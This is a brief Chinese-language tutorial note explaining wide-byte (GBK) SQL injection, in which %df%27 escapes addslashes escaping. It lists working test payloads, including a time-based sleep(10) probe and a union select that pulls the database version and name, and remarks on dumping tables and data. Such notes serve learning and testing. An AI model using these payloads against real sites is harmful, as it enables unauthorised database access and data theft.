简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字节注入
宽字节注入:
为了防止sql注入,开启了gpc或者使用了addslashes函数,这样我们输入的”’“单引号,会被转译成”\’“,一个斜杠和单引号。如果数据库设置了宽字节字符集(gbk编码),就会存在宽字节注入(set character_set_client=gbk)
%df%27===(addslashes)===>%df%5c%27===(数据库 GBK)===>運' <br />(输入%df%)=经过函数转译后变”\'“ ==gbk中”%df%5c“=運=====引号逃逸
宽字节注入判断
宽字节检测较为简单 输入%df%27 检测即可或者使用配合 and 1=1 检测即可 -1%df%27%20and%201=1—+ 页面是否存在乱码
-1%df%27%20or%20sleep(10)—+ 页面是否存在延时 均可以测试存在宽字节注入 -1%df%27%20union%20select%201,version(),database()—+
应该还可以爆库,表,字段,数据,到时候一起试下
